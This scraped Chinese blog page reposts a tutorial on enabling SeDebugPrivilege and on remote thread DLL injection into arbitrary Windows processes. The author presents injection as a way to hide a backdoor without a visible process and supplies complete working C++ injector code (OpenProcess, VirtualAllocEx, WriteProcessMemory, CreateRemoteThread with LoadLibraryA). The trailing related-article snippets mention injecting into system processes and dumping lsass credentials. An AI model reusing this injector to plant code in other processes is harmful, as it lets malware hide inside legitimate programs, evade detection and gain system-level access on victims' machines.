http://hi.baidu.com/43755979/blog/item/3ac19711ea01bdc4a6ef3f6a.html

要对一个任意进程(包括系统安全进程和服务进程)进行指定了写相关的访问权的 OpenProcess操作,只要当前进程具有SeDeDebug权限就可以了。要是一个用户是Administrator或是被给予了相应的权限,就可 以具有该权限。可是,就算我们用Administrator帐号对一个系统安全进程执行 OpenProcess(PROCESS_ALL_ACCESS,FALSE,     dwProcessID)还是会遇到“访问拒绝”的错误。什么原因呢?原来在默认的情况下进程的一些访问权限是没有被使能(Enabled)的,所以我们 要做的首先是使能这些权限。与此相关的一些API函数有OpenProcessToken、LookupPrivilegevalue、 AdjustTokenPrivileges。我们要修改一个进程的访问令牌,首先要获得进程访问令牌的句柄,这可以通过 OpenProcessToken得到,函数的原型如下:

函数原形如下:
BOOL OpenProcessToken(
    HANDLE ProcessHandle,
    DWORD DesiredAccess,
    PHANDLE TokenHandle
);
参数说明:
ProcessHandle是要修改访问权限的进程句柄;
DesiredAccess指定你所需要的操作类型;
TokenHandle是返回的访问令牌指针;

第一参数是要修改访问权限的进程句柄;第三个参数就是返回的访问令牌指针;第二个参数指定你要进行的操作类型,如要修改令牌我们要指定第二个参数为 TOKEN_ADJUST_PRIVILEGES(其它一些参数可参考Platform     SDK)。通过这个函数我们就可以得到当前进程的访问令牌的句柄(指定函数的第一个参数为GetCurrentProcess()就可以了)。接着我们可 以调用AdjustTokenPrivileges对这个访问令牌进行修改。AdjustTokenPrivileges的原型如下:
BOOL     AdjustTokenPrivileges(
            HANDLE    TokenHandle,                               //     handle     to     token
            BOOL    DisableAllPrivileges,                 //     disabling     option
            PTOKEN_PRIVILEGES    NewState,               //     privilege     information
            DWORD    BufferLength,                               //     size     of     buffer
            PTOKEN_PRIVILEGES    PreviousState,     //     original     state     buffer
            PDWORD    ReturnLength                               //     required     buffer     size
);
第一个参数是访问令牌的句柄;第二个参数决定是进行权限修改还是除能(Disable)所有权限;第三个参数指明要修改的权限,是一个指向 TOKEN_PRIVILEGES结构的指针,该结构包含一个数组,数据组的每个项指明了权限的类型和要进行的操作;     第四个参数是结构PreviousState的长度,如果PreviousState为空,该参数应为NULL;第五个参数也是一个指向 TOKEN_PRIVILEGES结构的指针,存放修改前的访问权限的信息,可空;最后一个参数为实际PreviousState结构返回的大小。在使用 这个函数前再看一下TOKEN_PRIVILEGES这个结构,其声明如下:

typedef     struct     _TOKEN_PRIVILEGES     {   
            DWORD     PrivilegeCount;   
            LUID_AND_ATTRIBUTES     Privileges[];   
}     TOKEN_PRIVILEGES,     *PTOKEN_PRIVILEGES;   
PrivilegeCount指的数组原素的个数,接着是一个LUID_AND_ATTRIBUTES类型的数组,再来看一下LUID_AND_ATTRIBUTES这个结构的内容,声明如下:

typedef     struct     _LUID_AND_ATTRIBUTES     {   
            LUID         Luid;   
            DWORD       Attributes;   
}     LUID_AND_ATTRIBUTES,     *PLUID_AND_ATTRIBUTES

第二个参数就指明了我们要进行的操作类型,有三个可选项:     SE_PRIVILEGE_ENABLED、SE_PRIVILEGE_ENABLED_BY_DEFAULT、 SE_PRIVILEGE_USED_FOR_ACCESS。要使能一个权限就指定Attributes为SE_PRIVILEGE_ENABLED。第 一个参数就是指权限的类型,是一个LUID的值,LUID就是指locally     unique     identifier,我想GUID大家是比较熟悉的,和GUID的要求保证全局唯一不同,LUID只要保证局部唯一,就是指在系统的每一次运行期间保证 是唯一的就可以了。另外和GUID相同的一点,LUID也是一个64位的值,相信大家都看过GUID那一大串的值,我们要怎么样才能知道一个权限对应的 LUID值是多少呢?这就要用到另外一个API函数LookupPrivilegevalue,其原形如下:

BOOL     LookupPrivilegevalue(
            LPCTSTR     lpSystemName,       //     system     name
            LPCTSTR     lpName,                   //     privilege     name
            PLUID     lpLuid                         //     locally     unique     identifier
);
第一个参数是系统的名称,如果是本地系统只要指明为NULL就可以了,第三个参数就是返回LUID的指针,第二个参数就是指明了权限的名称,如“SeDebugPrivilege”。在Winnt.h中还定义了一些权限名称的宏,如:

#define     SE_BACKUP_NAME                   TEXT("SeBackupPrivilege")

#define     SE_RESTORE_NAME                 TEXT("SeRestorePrivilege")

#define     SE_SHUTDOWN_NAME               TEXT("SeShutdownPrivilege")

#define     SE_DEBUG_NAME                     TEXT("SeDebugPrivilege")

这样通过这三个函数的调用,我们就可以用OpenProcess(PROCESS_ALL_ACCESS,FALSE,     dwProcessID)来打获得任意进程的句柄,并且指定了所有的访问权。

http://hi.baidu.com/43755979/blog/item/73b35eddcbaab7db8d1029e2.html

没错,现在讨论的就是传说中的远程注入技术,目前一种非常流行的隐藏技术,因为它没有进程,是通过远程插入线程调用DLL文件实现的!在这里先说一 下.dll文件,.dll文件,其实就是动态连接库,它里面装封了提供.exe文件调用的函数,一般情况下,双击它,是不能运行它的,它只能由.exe来 调用,于是就有了远程注入了,原理很简单:我们把后门的主要功能写成一个函数,然后装封到.dl文件中,然后再另外写一个执行文件来启动它,这样就不会有 后门的进程了。那远程注入又指什么呢?这个问题问得好,一般情况下,每个进程都有自己的私有空间,理论上,别的进程是不允许对这个私人空间进行操作的,但 是,我们可以利用一些方法进入这个空间并进行操作,将自己的代码写入正在运行的进程中,于是就有了远程注入了。 
对dll后门的编写就不作过多的讨论了,现在来看实现注入功能的可执行文件的编写: 
用到的函数有: 
OpenProcessToken(); 
LookupPrivilegeValue(); 
AdjustTokenPrivileges(); 
OpenProcess(); 
VirtualAllocEx(); 
WriteProcessMemory(); 
GetProcAddress(); 
CreateRemoteThread();

先简单的介绍以下这些函数的作用,因为我们要操作的是系统中的其他进程,如果没有足够的系统权限,我们是无法写入甚至连读取其它进程的内存地址的,所以我们就需要提升自己的权限,用到以下3个函数 
OpenProcessToken();                          //打开进程令牌 
LookupPrivilegeValue();                   //返回一个本地系统独一无二的ID,用于系统权限更改 
AdjustTokenPrivileges(); //从英文意思也能看出它是更改进程权限用的吧?

进入宿主进程的内存空间 
在拥有了进入宿主进程空间的权限之后,我们就需要在其内存加入让它加载我们后门的代码了,用LoadLibraryA()函数就可以加载我们的DLL了, 它只需要DLL文件的路径就可以了,在这里我们要把DLL文件的路径写入到宿主的内存空间里,因为DLL的文件路径并不存在于宿主进程内存空间了,用到的 函数有: 
OpenProcess();//用于修改宿主进程的一些属性,详细参看MSDN 
VirtualAllocEx();//用于在宿主内存空间中申请内存空间以写入DLL的文件名 
WriteProcessMemory();//往申请到的空间中写入DLL的文件名

在宿主中启动新的线程 
用的是LoadLibraryA()函数来加载,但在使用LoadLibraryA()之前必须知道它的入口地址,所以用GetProcAdress来获 得它的入口地址,有了它的地址以后,就可以用CreateRemoteThread()函数来启动新的线程了,到次,整个注入过程完成,不过还不非常完 善,这就留给聪明的你来完成了;)。 
简单的例子:

#include <windows.h> 
#include <iostream.h>

int EnableDebugPriv(const char * name) 

                           HANDLE hToken; 
                           TOKEN_PRIVILEGES tp; 
                           LUID luid; 
                           //打开进程令牌环 
                           OpenProcessToken(GetCurrentProcess(), 
                                           TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, 
                                           &hToken); 
                           //获得进程本地唯一ID 
                           LookupPrivilegeValue(NULL,name,&luid) ;
     
                           tp.PrivilegeCount = 1; 
                           tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
                           tp.Privileges[0].Luid = luid; 
                           //调整权限 
                           AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL); 
                           return 0; 
}

//*****************************************************************************************************************************

BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId) 

                           HANDLE hRemoteProcess; 
                           EnableDebugPriv(SE_DEBUG_NAME); 
                           //打开远程线程 
                           hRemoteProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId );

char *pszLibFileRemote;

//使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名空间 
                           pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, lstrlen(DllFullPath)+1, 
                                                   MEM_COMMIT, PAGE_READWRITE);

//使用WriteProcessMemory函数将DLL的路径名写入到远程进程的内存空间 
                           WriteProcessMemory(hRemoteProcess, 
                                       pszLibFileRemote, (void *) DllFullPath, lstrlen(DllFullPath)+1, NULL);

//##############################################################################
                           //计算LoadLibraryA的入口地址 
                           PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE) 
                                   GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA"); 
                           //(关于GetModuleHandle函数GetProcAddress函数)

//启动远程线程LoadLibraryA,通过远程线程调用创建新的线程 
                           HANDLE hRemoteThread; 
                           if( (hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL) ) == NULL) 
                           { 
                               cout<<"注入线程失败!"<<endl; 
                               return FALSE; 
                           } 
//##############################################################################

/*
                           // 在//###…..//###里的语句也可以用如下的语句代替:
                            DWORD dwID;
                            LPVOID pFunc = LoadLibraryA;
                            HANDLE hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc, pszLibFileRemote, 0, &dwID );
                            //是不是感觉简单了很多
                           */

// 释放句柄

CloseHandle(hRemoteProcess);
                           CloseHandle(hRemoteThread);

return TRUE; 
}

//*****************************************************************************************************************************

int main()

                           InjectDll("c:zrqfzr.dll",3060) ;//这个数字是你想注入的进程的ID号 
                           return 0; 
}

[转]远程注入DLL : 取得句柄的令牌 OpenProcessToken()的更多相关文章

  1. DLL远程注入实例

    一般情况下,每个进程都有自己的私有空间,理论上,别的进程是不允许对这个私人空间进行操作的,但是,我们可以利用一些方法进入这个空间并进行操作,将自己的代码写入正在运行的进程中,于是就有了远程注入了. 对 ...

  2. 远程线程注入dll,突破session 0

    前言 之前已经提到过,远线程注入和内存写入隐藏模块,今天介绍突破session 0的dll注入 其实今天写这个的主要原因就是看到倾旋大佬有篇文章提到:有些反病毒引擎限制从lsass中dump出缓存,可 ...

  3. 远程线程注入DLL

    远程线程注入 0x00 前言 远程线程注入是一种经典的DLL注入技术.其实就是指一个新进程中另一个进程中创建线程的技术. 0x01 介绍 1.远程线程注入原理 画了一个图大致理解了下远程线程注入dll ...

  4. 【windows核心编程】使用远程线程注入DLL

    前言 该技术是指通过在[目标进程]中创建一个[远程线程]来达到注入的目的. 创建的[远程线程]函数为LoadLibrary, 线程函数的参数为DLL名字, 想要做的工作在DLL中编写.  示意图如下: ...

  5. HOOK -- DLL的远程注入技术详解(1)

    DLL的远程注入技术是目前Win32病毒广泛使用的一种技术.使用这种技术的病毒体通常位于一个DLL中,在系统启动的时候,一个EXE程序会将这个DLL加载至某些系统进程(如Explorer.exe)中运 ...

  6. 将DLL挂接到远程进程之中(远程注入)

    线程的远程注入 要实现线程的远程注入必须使用Windows提供的CreateRemoteThread函数来创建一个远程线程该函数的原型如下:HANDLE CreateRemoteThread(    ...

  7. 详细解读:远程线程注入DLL到PC版微信

    一.远程线程注入的原理 1.其基础是在 Windows 系统中,每个 .exe 文件在双击打开时都会加载 kernel32.dll 这个系统模块,该模块中有一个 LoadLibrary() 函数,可以 ...

  8. 使用远程线程来注入DLL

    使用远程线程来注入DLL DLL注入技术要求我们目标进程中的一个线程调用LoadLibrary来载入我们想要的DLL (1)用OpenProcess函数打开目标进程(2)用VirtualAllocEx ...

  9. DLL的远程注入技术

    DLL的远程注入技术是目前Win32病毒广泛使用的一种技术.使用这种技术的病毒体通常位于一个DLL中,在系统启动的时候,一个EXE程序会将这个DLL加载至某些系统进程(如Explorer.exe)中运 ...

随机推荐

  1. PHP解决并发问题的几种实现

    对于商品抢购等并发场景下,可能会出现超卖的现象,这时就需要解决并发所带来的这些问题了 在PHP语言中并没有原生的提供并发的解决方案,因此就需要借助其他方式来实现并发控制. 方案一:使用文件锁排它锁 f ...

  2. csu 1329 一行盒子(链表操作)

    1329: 一行盒子 Time Limit: 1 Sec  Memory Limit: 128 MB Submit: 693  Solved: 134 [Submit][Status][Web Boa ...

  3. csu 1756(数论+去重)

    Prime Time Limit: 3 Sec  Memory Limit: 128 MBSubmit: 84  Solved: 12[Submit][Status][Web Board] Descr ...

  4. C++ 静多态与动多态

    多态是指通过单一的标识支持不同的特定行为的能力. C++中有两种多态,称为动多态(运行期多态)和静多态(编译期多态),而静多态主要通过模板来实现,宏也是实现静多态的一种途径. 动多态在C++中是通过虚 ...

  5. EasyUi – 5.修改$.messager.show() 弹出窗口在浏览器顶部中间出现

    由于在easyui中$.messager.show() 只有一种弹出方式(在浏览器的或下角弹出),我最近在做一个项目的时候需要在浏览器的顶部中间出现.由于自己写花那么多的时间,所以就去修改了原码(不推 ...

  6. springboot 零xml集成mybatis

    maven依赖 <?xml version="1.0" encoding="UTF-8"?> <project xmlns="htt ...

  7. Web APi入门之基本操作(一)

    最近学习了下WebApi,WebApi是RESTful风格,根据请求方式决定操作.以博客的形式写出来,加深印象以及方便以后查看和复习. 1.首先我们使用VS创建一个空的WebApi项目 2.新建实体以 ...

  8. LoadRunner配置方案

    1.配置方案运行时设置 选择“Tools”>“Options”.在“Options”对话框有“Run-Time Settings”(运行时设置).“Timeout”(超时).“Run-Time  ...

  9. centos7 lamp环境搭建

    一.安装Apache1.安装yum -y install httpd2.开启apache服务systemctl start httpd.service3.设置apache服务开机启动systemctl ...

  10. ref:如何在大量jar包中搜索特定字符

    ref:https://www.cnblogs.com/jiangxinnju/p/5137760.html?utm_source=tuicool&utm_medium=referral 如何 ...